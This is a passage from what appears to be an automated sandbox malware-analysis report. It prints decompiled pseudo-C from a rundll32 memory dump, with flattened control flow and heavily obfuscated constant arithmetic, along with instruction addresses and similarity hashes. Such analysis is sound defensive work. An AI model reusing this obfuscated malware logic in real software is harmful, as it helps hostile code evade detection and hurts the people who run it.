								_push(_v2784);
								E002D47CE( &_v2084, _v2920, _v2884, _v2676, _v2928, E002EDCF7(_v2884, 0x2d1308, __eflags),  &_v1564, _v2844, _v2744);
								E002DA8B0(_v2904, _t722, _v2912);
								_t745 = _v2888;
								_t717 = E002DEA99(_t745, _t803, _v2776, _v2648,  &_v2604, _v2896);
								_t804 = _t804 + 0x5c;
								__eflags = _t717;
								if(__eflags != 0) {
									_t798 = 0x277711d;
									while(1) {
										L1:
										goto L2;
									}
								}
							} else {
								if(_t798 == 0x47e8611) {
									_t745 =  &_v2636;
									E002EDEDC(_t745, _v2716, _v2692, _v2712,  &_v2628, _v2812);
									_t804 = _t804 + 0x10;
									asm("sbb esi, esi");
									_t798 = (_t798 & 0xfcd19e6d) + 0xe3ea8aa;
									while(1) {
										L1:
										goto L2;
									}
								} else {
									_t816 = _t798 - _t707;
									if(_t798 != _t707) {
										goto L24;
									} else {
										_push(_v2916);
										_push(_v2736);
										_t730 = E002EDCF7(_v2852, 0x2d13f8, _t816);
										_pop(_t758);
										E002E453F(_v2820, _t816, _v2672, _t730, _v2868,  &_v1044, _t758, _v2704, _v2908, _t797,  &_v2604);
										_t804 = _t804 + 0x24;
										E002DA8B0(_v2724, _t730, _v2652);
										_pop(_t745);
										_t798 = 0xae01df1;
										while(1) {
											L1:
											goto L2;
										}
									}
								}
							}
						}
						goto L27;
						L24:
						__eflags = _t798 - 0xe39a6fa;
					} while (__eflags != 0);
					return _t707;
				}
			}












































































































                                                                                                                                  0x002e4b8d
                                                                                                                                  0x002e4b97
                                                                                                                                  0x002e4ba2
                                                                                                                                  0x002e4bad
                                                                                                                                  0x002e4bb8
                                                                                                                                  0x002e4bc3
                                                                                                                                  0x002e4bce
                                                                                                                                  0x002e4bd9
                                                                                                                                  0x002e4be1
                                                                                                                                  0x002e4bec
                                                                                                                                  0x002e4bf7
                                                                                                                                  0x002e4bff
                                                                                                                                  0x002e4c04
                                                                                                                                  0x002e4c09
                                                                                                                                  0x002e4c11
                                                                                                                                  0x002e4c19
                                                                                                                                  0x002e4c21
                                                                                                                                  0x002e4c33
                                                                                                                                  0x002e4c35
                                                                                                                                  0x002e4c3a
                                                                                                                                  0x002e4c3f
                                                                                                                                  0x002e4c45
                                                                                                                                  0x002e4c4d
                                                                                                                                  0x002e4c55
                                                                                                                                  0x002e4c60
                                                                                                                                  0x002e4c68
                                                                                                                                  0x002e4c73
                                                                                                                                  0x002e4c7e
                                                                                                                                  0x002e4c8b
                                                                                                                                  0x002e4c8c
                                                                                                                                  0x002e4c96
                                                                                                                                  0x002e4c9a
                                                                                                                                  0x002e4c9f
                                                                                                                                  0x002e4ca7
                                                                                                                                  0x002e4cb2
                                                                                                                                  0x002e4cba
                                                                                                                                  0x002e4cc5
                                                                                                                                  0x002e4cd0
                                                                                                                                  0x002e4cdb
                                                                                                                                  0x002e4ce6
                                                                                                                                  0x002e4cf1
                                                                                                                                  0x002e4cfc
                                                                                                                                  0x002e4d07
                                                                                                                                  0x002e4d0f
                                                                                                                                  0x002e4d17
                                                                                                                                  0x002e4d1f
                                                                                                                                  0x002e4d24
                                                                                                                                  0x002e4d2c
                                                                                                                                  0x002e4d37
                                                                                                                                  0x002e4d42
                                                                                                                                  0x002e4d4d
                                                                                                                                  0x002e4d5a
                                                                                                                                  0x002e4d5e
                                                                                                                                  0x002e4d6b
                                                                                                                                  0x002e4d6f
                                                                                                                                  0x002e4d77
                                                                                                                                  0x002e4d8a
                                                                                                                                  0x002e4d91
                                                                                                                                  0x002e4d99
                                                                                                                                  0x002e4da4
                                                                                                                                  0x002e4daf
                                                                                                                                  0x002e4dba
                                                                                                                                  0x002e4dc5
                                                                                                                                  0x002e4dd0
                                                                                                                                  0x002e4ddb
                                                                                                                                  0x002e4de3
                                                                                                                                  0x002e4df0
                                                                                                                                  0x002e4df8
                                                                                                                                  0x002e4e07
                                                                                                                                  0x002e4e0a
                                                                                                                                  0x002e4e0e
                                                                                                                                  0x002e4e16
                                                                                                                                  0x002e4e1e
                                                                                                                                  0x002e4e29
                                                                                                                                  0x002e4e34
                                                                                                                                  0x002e4e3f
                                                                                                                                  0x002e4e4a
                                                                                                                                  0x002e4e55
                                                                                                                                  0x002e4e60
                                                                                                                                  0x002e4e6b
                                                                                                                                  0x002e4e76
                                                                                                                                  0x002e4e7e
                                                                                                                                  0x002e4e83
                                                                                                                                  0x002e4e8b
                                                                                                                                  0x002e4e93
                                                                                                                                  0x002e4e9b
                                                                                                                                  0x002e4ea6
                                                                                                                                  0x002e4eb1
                                                                                                                                  0x002e4eb9
                                                                                                                                  0x002e4ec4
                                                                                                                                  0x002e4ecc
                                                                                                                                  0x002e4ed4
                                                                                                                                  0x002e4ee1
                                                                                                                                  0x002e4ee5
                                                                                                                                  0x002e4eed
                                                                                                                                  0x002e4ef5
                                                                                                                                  0x002e4efa
                                                                                                                                  0x002e4eff
                                                                                                                                  0x002e4f07
                                                                                                                                  0x002e4f0f
                                                                                                                                  0x002e4f1a
                                                                                                                                  0x002e4f25
                                                                                                                                  0x002e4f30
                                                                                                                                  0x002e4f38
                                                                                                                                  0x002e4f41
                                                                                                                                  0x002e4f45
                                                                                                                                  0x002e4f4a
                                                                                                                                  0x002e4f52
                                                                                                                                  0x002e4f5f
                                                                                                                                  0x002e4f63
                                                                                                                                  0x002e4f70
                                                                                                                                  0x002e4f74
                                                                                                                                  0x002e4f7c
                                                                                                                                  0x002e4f87
                                                                                                                                  0x002e4f8e
                                                                                                                                  0x002e4f99
                                                                                                                                  0x002e4fa4
                                                                                                                                  0x002e4fb4
                                                                                                                                  0x002e4fbc
                                                                                                                                  0x002e4fbf
                                                                                                                                  0x002e4fc3
                                                                                                                                  0x002e4fc8
                                                                                                                                  0x002e4fd0
                                                                                                                                  0x002e4fd8
                                                                                                                                  0x002e4fdd
                                                                                                                                  0x002e4fe2
                                                                                                                                  0x002e4fea
                                                                                                                                  0x002e4ff2
                                                                                                                                  0x002e4ffa
                                                                                                                                  0x002e5002
                                                                                                                                  0x002e500a
                                                                                                                                  0x002e5012
                                                                                                                                  0x002e501a
                                                                                                                                  0x002e5025
                                                                                                                                  0x002e5032
                                                                                                                                  0x002e5039
                                                                                                                                  0x002e5044
                                                                                                                                  0x002e504f
                                                                                                                                  0x002e505a
                                                                                                                                  0x002e5065
                                                                                                                                  0x002e506d
                                                                                                                                  0x002e5072
                                                                                                                                  0x002e507a
                                                                                                                                  0x002e5082
                                                                                                                                  0x002e508a
                                                                                                                                  0x002e5095
                                                                                                                                  0x002e50a0
                                                                                                                                  0x002e50ab
                                                                                                                                  0x002e50b6
                                                                                                                                  0x002e50c1
                                                                                                                                  0x002e50c8
                                                                                                                                  0x002e50d3
                                                                                                                                  0x002e50e2
                                                                                                                                  0x002e50e5
                                                                                                                                  0x002e50e9
                                                                                                                                  0x002e50f1
                                                                                                                                  0x002e50f9
                                                                                                                                  0x002e5104
                                                                                                                                  0x002e510c
                                                                                                                                  0x002e5117
                                                                                                                                  0x002e5122
                                                                                                                                  0x002e512a
                                                                                                                                  0x002e513a
                                                                                                                                  0x002e513e
                                                                                                                                  0x002e5146
                                                                                                                                  0x002e514e
                                                                                                                                  0x002e5156
                                                                                                                                  0x002e515e
                                                                                                                                  0x002e5166
                                                                                                                                  0x002e516b
                                                                                                                                  0x002e5173
                                                                                                                                  0x002e5186
                                                                                                                                  0x002e5187
                                                                                                                                  0x002e518e
                                                                                                                                  0x002e5199
                                                                                                                                  0x002e51a4
                                                                                                                                  0x002e51af
                                                                                                                                  0x002e51ba
                                                                                                                                  0x002e51c5
                                                                                                                                  0x002e51d0
                                                                                                                                  0x002e51db
                                                                                                                                  0x002e51e6
                                                                                                                                  0x002e51f1
                                                                                                                                  0x002e51fc
                                                                                                                                  0x002e5205
                                                                                                                                  0x002e520c
                                                                                                                                  0x002e5217
                                                                                                                                  0x002e5222
                                                                                                                                  0x002e522d
                                                                                                                                  0x002e5238
                                                                                                                                  0x002e5243
                                                                                                                                  0x002e524e
                                                                                                                                  0x002e5256
                                                                                                                                  0x002e5261
                                                                                                                                  0x002e526c
                                                                                                                                  0x002e5277
                                                                                                                                  0x002e5282
                                                                                                                                  0x002e5295
                                                                                                                                  0x002e529c
                                                                                                                                  0x002e52a4
                                                                                                                                  0x002e52af
                                                                                                                                  0x002e52ba
                                                                                                                                  0x002e52cd
                                                                                                                                  0x002e52d4
                                                                                                                                  0x002e52e1
                                                                                                                                  0x002e52f5
                                                                                                                                  0x002e52f8
                                                                                                                                  0x002e52ff
                                                                                                                                  0x002e530a
                                                                                                                                  0x002e5315
                                                                                                                                  0x002e531d
                                                                                                                                  0x002e5322
                                                                                                                                  0x002e532a
                                                                                                                                  0x002e5332
                                                                                                                                  0x002e533a
                                                                                                                                  0x002e5345
                                                                                                                                  0x002e5350
                                                                                                                                  0x002e535b
                                                                                                                                  0x002e5366
                                                                                                                                  0x002e5379
                                                                                                                                  0x002e5380
                                                                                                                                  0x002e538b
                                                                                                                                  0x002e5393
                                                                                                                                  0x002e5398
                                                                                                                                  0x002e53a5
                                                                                                                                  0x002e53a9
                                                                                                                                  0x002e53b1
                                                                                                                                  0x002e53bc
                                                                                                                                  0x002e53c7
                                                                                                                                  0x002e53d2
                                                                                                                                  0x002e53dd
                                                                                                                                  0x002e53e5
                                                                                                                                  0x002e53ea
                                                                                                                                  0x002e53f7
                                                                                                                                  0x002e53fb
                                                                                                                                  0x002e5403
                                                                                                                                  0x002e540e
                                                                                                                                  0x002e5416
                                                                                                                                  0x002e5421
                                                                                                                                  0x002e542c
                                                                                                                                  0x002e543f
                                                                                                                                  0x002e5446
                                                                                                                                  0x002e5451
                                                                                                                                  0x002e5459
                                                                                                                                  0x002e5463
                                                                                                                                  0x002e546c
                                                                                                                                  0x002e5470
                                                                                                                                  0x002e5478
                                                                                                                                  0x002e5483
                                                                                                                                  0x002e548b
                                                                                                                                  0x002e5496
                                                                                                                                  0x002e549e
                                                                                                                                  0x002e54a3
                                                                                                                                  0x002e54ab
                                                                                                                                  0x002e54b3
                                                                                                                                  0x002e54bb
                                                                                                                                  0x002e54c6
                                                                                                                                  0x002e54d1
                                                                                                                                  0x002e54dc
                                                                                                                                  0x002e54e7
                                                                                                                                  0x002e54f2
                                                                                                                                  0x002e54fa
                                                                                                                                  0x002e5505
                                                                                                                                  0x002e5510
                                                                                                                                  0x002e551b
                                                                                                                                  0x002e5523
                                                                                                                                  0x002e552e
                                                                                                                                  0x002e553e
                                                                                                                                  0x002e5546
                                                                                                                                  0x002e554e
                                                                                                                                  0x002e5556
                                                                                                                                  0x002e5568
                                                                                                                                  0x002e5570
                                                                                                                                  0x002e5578
                                                                                                                                  0x002e5580
                                                                                                                                  0x002e558b
                                                                                                                                  0x002e5596
                                                                                                                                  0x002e55a1
                                                                                                                                  0x002e55ac
                                                                                                                                  0x002e55c1
                                                                                                                                  0x002e55c2
                                                                                                                                  0x002e55d1
                                                                                                                                  0x002e55d8
                                                                                                                                  0x002e55e3
                                                                                                                                  0x002e55f6
                                                                                                                                  0x002e55fd
                                                                                                                                  0x002e5608
                                                                                                                                  0x002e5613
                                                                                                                                  0x002e561e
                                                                                                                                  0x002e5629
                                                                                                                                  0x002e5634
                                                                                                                                  0x002e563f
                                                                                                                                  0x002e564a
                                                                                                                                  0x002e565a
                                                                                                                                  0x002e5661
                                                                                                                                  0x002e566c
                                                                                                                                  0x002e5677
                                                                                                                                  0x002e567f
                                                                                                                                  0x002e568a
                                                                                                                                  0x002e5695
                                                                                                                                  0x002e56a8
                                                                                                                                  0x002e56af
                                                                                                                                  0x002e56ba
                                                                                                                                  0x002e56c2
                                                                                                                                  0x002e56d0
                                                                                                                                  0x002e56d4
                                                                                                                                  0x002e56dc
                                                                                                                                  0x002e56e4
                                                                                                                                  0x002e56ec
                                                                                                                                  0x002e56f1
                                                                                                                                  0x002e56f9
                                                                                                                                  0x002e5709
                                                                                                                                  0x002e570e
                                                                                                                                  0x002e5715
                                                                                                                                  0x002e5717
                                                                                                                                  0x002e5717
                                                                                                                                  0x002e571c
                                                                                                                                  0x002e571c
                                                                                                                                  0x002e571c
                                                                                                                                  0x002e571c
                                                                                                                                  0x002e5722
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x002e5a30
                                                                                                                                  0x002e5a36
                                                                                                                                  0x002e5ac0
                                                                                                                                  0x002e5ace
                                                                                                                                  0x002e5ad0
                                                                                                                                  0x002e5ad1
                                                                                                                                  0x002e5ad3
                                                                                                                                  0x002e5ad5
                                                                                                                                  0x002e5ae0
                                                                                                                                  0x002e5ae7
                                                                                                                                  0x002e5ae8
                                                                                                                                  0x002e5aed
                                                                                                                                  0x002e5af0
                                                                                                                                  0x002e5af5
                                                                                                                                  0x00000000
                                                                                                                                  0x002e5a3c
                                                                                                                                  0x002e5a3c
                                                                                                                                  0x002e5a42
                                                                                                                                  0x002e5a9b
                                                                                                                                  0x002e5aa2
                                                                                                                                  0x002e5aa7
                                                                                                                                  0x002e5aa9
                                                                                                                                  0x002e5aac
                                                                                                                                  0x002e5ab3
                                                                                                                                  0x002e5ab8
                                                                                                                                  0x00000000
                                                                                                                                  0x002e5a44
                                                                                                                                  0x002e5a44
                                                                                                                                  0x002e5a4a
                                                                                                                                  0x00000000
                                                                                                                                  0x002e5b2d
                                                                                                                                  0x002e5a50
                                                                                                                                  0x002e5a56
                                                                                                                                  0x00000000
                                                                                                                                  0x002e5a5c
                                                                                                                                  0x002e5a6b
                                                                                                                                  0x002e5a70
                                                                                                                                  0x002e5a71
                                                                                                                                  0x002e5717
                                                                                                                                  0x002e5717
                                                                                                                                  0x00000000
                                                                                                                                  0x002e5717
                                                                                                                                  0x002e5717
                                                                                                                                  0x002e5a56
                                                                                                                                  0x002e5a42
                                                                                                                                  0x002e5b3a
                                                                                                                                  0x002e5b3a
                                                                                                                                  0x002e5b3a
                                                                                                                                  0x002e5728
                                                                                                                                  0x002e5a20
                                                                                                                                  0x002e5a25
                                                                                                                                  0x002e5a26
                                                                                                                                  0x002e5717
                                                                                                                                  0x002e5717
                                                                                                                                  0x00000000
                                                                                                                                  0x002e5717
                                                                                                                                  0x002e5717
                                                                                                                                  0x002e5734
                                                                                                                                  0x002e59ce
                                                                                                                                  0x002e59dc
                                                                                                                                  0x002e59e3
                                                                                                                                  0x002e59ee
                                                                                                                                  0x002e59f8
                                                                                                                                  0x002e59f9
                                                                                                                                  0x002e59fe
                                                                                                                                  0x002e5a01
                                                                                                                                  0x002e5717
                                                                                                                                  0x002e5717
                                                                                                                                  0x00000000
                                                                                                                                  0x002e5717
                                                                                                                                  0x002e5717
                                                                                                                                  0x002e5740
                                                                                                                                  0x002e5948
                                                                                                                                  0x002e597a
                                                                                                                                  0x002e59ad
                                                                                                                                  0x002e59b4
                                                                                                                                  0x002e59b9
                                                                                                                                  0x002e59bc
                                                                                                                                  0x002e59be
                                                                                                                                  0x002e59c4
                                                                                                                                  0x00000000
                                                                                                                                  0x002e59c4
                                                                                                                                  0x002e5746
                                                                                                                                  0x002e574c
                                                                                                                                  0x002e584c
                                                                                                                                  0x002e5889
                                                                                                                                  0x002e5890
                                                                                                                                  0x002e5895
                                                                                                                                  0x002e589e
                                                                                                                                  0x002e58e5
                                                                                                                                  0x002e58f4
                                                                                                                                  0x002e5918
                                                                                                                                  0x002e591c
                                                                                                                                  0x002e5921
                                                                                                                                  0x002e5924
                                                                                                                                  0x002e5926
                                                                                                                                  0x002e592c
                                                                                                                                  0x002e5717
                                                                                                                                  0x002e5717
                                                                                                                                  0x00000000
                                                                                                                                  0x002e5717
                                                                                                                                  0x002e5717
                                                                                                                                  0x002e5752
                                                                                                                                  0x002e5758
                                                                                                                                  0x002e57f8
                                                                                                                                  0x002e580d
                                                                                                                                  0x002e5812
                                                                                                                                  0x002e5817
                                                                                                                                  0x002e581f
                                                                                                                                  0x002e5717
                                                                                                                                  0x002e5717
                                                                                                                                  0x00000000
                                                                                                                                  0x002e5717
                                                                                                                                  0x002e575e
                                                                                                                                  0x002e575e
                                                                                                                                  0x002e5760
                                                                                                                                  0x00000000
                                                                                                                                  0x002e5766
                                                                                                                                  0x002e5766
                                                                                                                                  0x002e576f
                                                                                                                                  0x002e577a
                                                                                                                                  0x002e5780
                                                                                                                                  0x002e57ba
                                                                                                                                  0x002e57bf
                                                                                                                                  0x002e57d2
                                                                                                                                  0x002e57d7
                                                                                                                                  0x002e57d8
                                                                                                                                  0x002e5717
                                                                                                                                  0x002e5717
                                                                                                                                  0x00000000
                                                                                                                                  0x002e5717
                                                                                                                                  0x002e5717
                                                                                                                                  0x002e5760
                                                                                                                                  0x002e5758
                                                                                                                                  0x002e574c
                                                                                                                                  0x00000000
                                                                                                                                  0x002e5afa
                                                                                                                                  0x002e5afa
                                                                                                                                  0x002e5afa
                                                                                                                                  0x00000000
                                                                                                                                  0x002e571c

                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451115709.00000000002D1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451090160.00000000002D0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451178530.00000000002F3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_2d0000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: FolderPath
                                                                                                                                  • String ID: -X$8ZD$8ZD$:%$>`U$@Y$DIn $G4%>$R@$[z}~$_p$e3c$noz$xO4$~wP`$!=$'$zQ5
                                                                                                                                  • API String ID: 1514166925-4215140744
                                                                                                                                  • Opcode ID: d6522e3f27b03c8d313e36151a6b672b484a5f7614adb33c193656496e1e7601
                                                                                                                                  • Instruction ID: 2421a6bb3ce8cb1691274e2525a4b3ceb83eb1288edb11f287019b8eeb42ddc9
                                                                                                                                  • Opcode Fuzzy Hash: d6522e3f27b03c8d313e36151a6b672b484a5f7614adb33c193656496e1e7601
                                                                                                                                  • Instruction Fuzzy Hash: 7772FF714183819FD3B8CF25C58AB9BBBE1BBC4318F508A1DE1DA96260D7B48959CF43
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 002E2550 Relevance: 21.1, Strings: 16, Instructions: 1077COMMONCrypto
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 98%
                                                                                                                                  			E002E2550() {
				signed int _v28;
				char _v36;
				char _v84;
				signed int _v100;
				signed int _v104;
				signed int _v112;
				signed int _v124;
				signed int _v140;
				intOrPtr _v144;
				char _v152;
				signed int _v172;
				char _v180;
				char _v188;
				char _v192;
				char _v196;
				char _v200;
				char _v204;
				signed int _v208;
				signed int _v212;
				signed int _v216;
				signed int _v220;
				signed int _v224;
				signed int _v228;
				signed int _v232;
				signed int _v236;
				signed int _v240;
				signed int _v244;
				signed int _v248;
				signed int _v252;
				signed int _v256;
				signed int _v260;
				signed int _v264;
				signed int _v268;
				signed int _v272;
				signed int _v276;
				signed int _v280;
				signed int _v284;
				signed int _v288;
				unsigned int _v292;
				signed int _v296;
				signed int _v300;
				signed int _v304;
				signed int _v308;
				signed int _v312;
				signed int _v316;
				signed int _v320;
				signed int _v324;
				signed int _v328;
				signed int _v332;
				signed int _v336;
				signed int _v340;
				signed int _v344;
				signed int _v348;
				signed int _v352;
				signed int _v356;
				signed int _v360;
				signed int _v364;
				signed int _v368;
				signed int _v372;
				signed int _v376;
				signed int _v380;
				signed int _v384;
				signed int _v388;
				signed int _v392;
				unsigned int _v396;
				signed int _v400;
				signed int _v404;
				signed int _v408;
				signed int _v412;
				signed int _v416;
				signed int _v420;
				signed int _v424;
				signed int _v428;
				signed int _v432;
				signed int _v436;
				signed int _v440;
				signed int _v444;
				signed int _v448;
				signed int _v452;
				signed int _v456;
				signed int _v460;
				signed int _v464;
				signed int _v468;
				signed int _v472;
				signed int _v476;
				signed int _v480;
				unsigned int _v484;
				unsigned int _v488;
				signed int _v492;
				signed int _v496;
				signed int _v500;
				signed int _v504;
				signed int _v508;
				unsigned int _v512;
				signed int _v516;
				signed int _v520;
				signed int _v524;
				signed int _v528;
				unsigned int _v532;
				signed int _v536;
				signed int _v540;
				unsigned int _v544;
				signed int _v548;
				unsigned int _v552;
				signed int _v556;
				signed int _v560;
				signed int _v564;
				signed int _v568;
				signed int _v572;
				unsigned int _v576;
				signed int _v580;
				signed int _v584;
				unsigned int _v588;
				unsigned int _v592;
				signed int _v596;
				signed int _v600;
				signed int _v604;
				signed int _v608;
				signed int _v612;
				signed int _v616;
				signed int _v620;
				signed int _v624;
				signed int _v628;
				signed int _v632;
				signed int _v636;
				signed int _t1114;
				signed int _t1118;
				signed int _t1122;
				signed int _t1124;
				signed int _t1125;
				signed int _t1130;
				void* _t1134;
				signed int _t1141;
				signed int _t1190;
				signed int _t1191;
				signed int _t1193;
				signed int _t1194;
				signed int _t1195;
				signed int _t1196;
				signed int _t1197;
				signed int _t1198;
				signed int _t1199;
				signed int _t1200;
				signed int _t1201;
				signed int _t1202;
				signed int _t1203;
				signed int _t1204;
				signed int _t1205;
				signed int _t1206;
				signed int _t1207;
				signed int _t1208;
				signed int _t1209;
				signed int _t1210;
				signed int _t1211;
				signed int _t1212;
				signed int _t1213;
				signed int _t1214;
				signed int _t1215;
				signed int _t1313;
				signed int _t1314;
				signed int _t1317;
				signed int _t1343;
				void* _t1345;
				void* _t1348;
				void* _t1349;
				void* _t1350;

				_t1345 = (_t1343 & 0xfffffff8) - 0x278;
				_v372 = 0xaca17;
				_v372 = _v372 << 9;
				_v372 = _v372 ^ 0xc9927700;
				_v372 = _v372 ^ 0xdc065802;
				_v560 = 0xa158a0;
				_v560 = _v560 + 0xffff5dcd;
				_v560 = _v560 ^ 0x175bafac;
				_v560 = _v560 + 0xffff9e49;
				_v560 = _v560 ^ 0x17fab80a;
				_v288 = 0xd4a9a6;
				_v288 = _v288 >> 3;
				_v288 = _v288 ^ 0x001a9534;
				_v504 = 0xe9a5d3;
				_v504 = _v504 << 0xa;
				_v504 = _v504 | 0xea5982c0;
				_t1190 = 0x5f;
				_v504 = _v504 / _t1190;
				_v504 = _v504 ^ 0x028f5db6;
				_t1317 = 0x5d794ec;
				_v304 = 0x85b0a3;
				_v304 = _v304 | 0x2bca024a;
				_v304 = _v304 ^ 0x2bcc012b;
				_v556 = 0x1ecc82;
				_v556 = _v556 | 0xf08df0d8;
				_v556 = _v556 + 0xa531;
				_v556 = _v556 ^ 0xfe698427;
				_v556 = _v556 ^ 0x0ecdaa65;
				_v300 = 0x8f610e;
				_v300 = _v300 + 0xfe33;
				_v300 = _v300 ^ 0x0094e207;
				_v600 = 0x1cab4a;
				_t1193 = 0x18;
				_v600 = _v600 / _t1193;
				_v600 = _v600 + 0xffff3801;
				_v600 = _v600 + 0x515c;
				_v600 = _v600 ^ 0x0001e7c9;
				_v568 = 0xbab742;
				_v568 = _v568 + 0xcc5d;
				_v568 = _v568 | 0x5c48aa02;
				_t1194 = 0x5e;
				_v568 = _v568 / _t1194;
				_v568 = _v568 ^ 0x00f9db2d;
				_v576 = 0x767b63;
				_v576 = _v576 >> 3;
				_v576 = _v576 + 0xd487;
				_v576 = _v576 >> 0x10;
				_v576 = _v576 ^ 0x00061026;
				_v628 = 0xe4759e;
				_v628 = _v628 ^ 0xa26bb658;
				_v628 = _v628 * 0x1d;
				_v628 = _v628 ^ 0xba259216;
				_v628 = _v628 ^ 0xd068fc76;
				_v500 = 0xe51d81;
				_v500 = _v500 >> 7;
				_v500 = _v500 + 0xc085;
				_v500 = _v500 * 0x6e;
				_v500 = _v500 ^ 0x01113a52;
				_v512 = 0xc902c8;
				_v512 = _v512 >> 3;
				_v512 = _v512 >> 3;
				_v512 = _v512 >> 7;
				_v512 = _v512 ^ 0x0003c164;
				_v532 = 0xda62af;
				_v532 = _v532 ^ 0x7c695b99;
				_v532 = _v532 >> 0xd;
				_v532 = _v532 >> 6;
				_v532 = _v532 ^ 0x0009f043;
				_v604 = 0x69f539;
				_v604 = _v604 << 0xd;
				_v604 = _v604 + 0xffffd530;
				_v604 = _v604 + 0xffffaf77;
				_v604 = _v604 ^ 0x3ead80db;
				_v384 = 0xab9f19;
				_t1195 = 0xf;
				_t1313 = 0x50;
				_v384 = _v384 * 0x15;
				_v384 = _v384 * 9;
				_v384 = _v384 ^ 0x7eb18135;
				_v256 = 0xb5a6bd;
				_v256 = _v256 | 0x1f71a96d;
				_v256 = _v256 ^ 0x1ffe1878;
				_v264 = 0xca80f7;
				_v264 = _v264 ^ 0x226a3f90;
				_v264 = _v264 ^ 0x22af4e12;
				_v432 = 0x1b5a57;
				_v432 = _v432 << 0xa;
				_v432 = _v432 | 0x8c1547fb;
				_v432 = _v432 ^ 0xed77fd98;
				_v312 = 0xf59d00;
				_v312 = _v312 | 0xee7978e1;
				_v312 = _v312 ^ 0xeef23383;
				_v608 = 0x388a49;
				_v608 = _v608 ^ 0x20b0147d;
				_v608 = _v608 | 0x120a0452;
				_v608 = _v608 / _t1195;
				_v608 = _v608 ^ 0x035d442e;
				_v632 = 0x8bfb5e;
				_v632 = _v632 / _t1313;
				_v632 = _v632 | 0x8005d6ab;
				_v632 = _v632 + 0xbf6f;
				_v632 = _v632 ^ 0x80035879;
				_v624 = 0xe5ec6;
				_v624 = _v624 << 2;
				_v624 = _v624 >> 9;
				_v624 = _v624 | 0xadaec6d6;
				_v624 = _v624 ^ 0xada90310;
				_v392 = 0x144ef;
				_t1196 = 0x44;
				_v392 = _v392 / _t1196;
				_v392 = _v392 + 0xc90b;
				_v392 = _v392 ^ 0x0000cf97;
				_v236 = 0xf3d10d;
				_t1197 = 0x4a;
				_v236 = _v236 * 0x7a;
				_v236 = _v236 ^ 0x74330487;
				_v324 = 0xc3c34b;
				_v324 = _v324 * 0x6c;
				_v324 = _v324 ^ 0x529af392;
				_v520 = 0x2a70ca;
				_v520 = _v520 / _t1197;
				_v520 = _v520 >> 4;
				_v520 = _v520 ^ 0x2a4d5a72;
				_v520 = _v520 ^ 0x2a4dbf28;
				_v340 = 0xc9c056;
				_t1198 = 7;
				_v340 = _v340 * 0x23;
				_v340 = _v340 | 0xe2238341;
				_v340 = _v340 ^ 0xfbb710ef;
				_v248 = 0x9a54c0;
				_v248 = _v248 | 0xe08ac880;
				_v248 = _v248 ^ 0xe09bcbd4;
				_v348 = 0xe0760;
				_v348 = _v348 << 7;
				_v348 = _v348 + 0x49a3;
				_v348 = _v348 ^ 0x070edb7d;
				_v356 = 0xf94015;
				_v356 = _v356 * 0x4d;
				_v356 = _v356 << 1;
				_v356 = _v356 ^ 0x95f7b4be;
				_v320 = 0x1268a5;
				_v320 = _v320 / _t1198;
				_v320 = _v320 ^ 0x00080ceb;
				_v396 = 0xbdcf3e;
				_t1199 = 0x4b;
				_v396 = _v396 * 0x4d;
				_v396 = _v396 >> 2;
				_v396 = _v396 ^ 0x0e48dd39;
				_v596 = 0x7780dd;
				_v596 = _v596 << 0xd;
				_v596 = _v596 | 0xdff7e7fd;
				_v596 = _v596 ^ 0xfff000ad;
				_v492 = 0x5c66b3;
				_v492 = _v492 * 0x2a;
				_v492 = _v492 ^ 0xe8f32aee;
				_v492 = _v492 >> 0xd;
				_v492 = _v492 ^ 0x000eb956;
				_v316 = 0x3e4fae;
				_v316 = _v316 >> 3;
				_v316 = _v316 ^ 0x00075837;
				_v344 = 0xe0dcd8;
				_v344 = _v344 >> 1;
				_v344 = _v344 + 0xffff4400;
				_v344 = _v344 ^ 0x0066aca9;
				_v460 = 0xbe16e8;
				_v460 = _v460 * 0x45;
				_v460 = _v460 ^ 0x56f71a5b;
				_v460 = _v460 / _t1199;
				_v460 = _v460 ^ 0x0158823c;
				_v588 = 0x54b44f;
				_v588 = _v588 ^ 0xc5cf08f3;
				_v588 = _v588 ^ 0x4b1db793;
				_v588 = _v588 >> 0xb;
				_v588 = _v588 ^ 0x00183ace;
				_v524 = 0xbfc9bb;
				_t1200 = 0x67;
				_v524 = _v524 * 0x4d;
				_v524 = _v524 * 0x71;
				_v524 = _v524 << 1;
				_v524 = _v524 ^ 0xed1ab829;
				_v376 = 0x55c29;
				_v376 = _v376 << 0xc;
				_v376 = _v376 ^ 0xdae248eb;
				_v376 = _v376 ^ 0x8f2c7d73;
				_v424 = 0x330008;
				_v424 = _v424 << 0xb;
				_v424 = _v424 / _t1200;
				_v424 = _v424 ^ 0x017d7462;
				_v580 = 0xb4c97;
				_v580 = _v580 | 0x569d8b1e;
				_v580 = _v580 >> 1;
				_t1201 = 3;
				_v580 = _v580 / _t1201;
				_v580 = _v580 ^ 0x0e68230a;
				_v328 = 0x695dff;
				_v328 = _v328 ^ 0x424f14af;
				_v328 = _v328 ^ 0x4224025c;
				_v284 = 0xae8351;
				_t1202 = 0x57;
				_v284 = _v284 * 0x60;
				_v284 = _v284 ^ 0x417e5081;
				_v444 = 0x78eba1;
				_v444 = _v444 * 0x5f;
				_v444 = _v444 ^ 0x00193e0b;
				_v444 = _v444 ^ 0x2cc98685;
				_v592 = 0x15a443;
				_v592 = _v592 / _t1202;
				_v592 = _v592 + 0xffff9c6f;
				_v592 = _v592 >> 5;
				_v592 = _v592 ^ 0x07f20231;
				_v216 = 0x5d0672;
				_v216 = _v216 << 3;
				_v216 = _v216 ^ 0x02ee7d7e;
				_v548 = 0xb50861;
				_v548 = _v548 >> 0xc;
				_v548 = _v548 << 0xf;
				_v548 = _v548 + 0xffffef54;
				_v548 = _v548 ^ 0x05ac6923;
				_v452 = 0x2163b6;
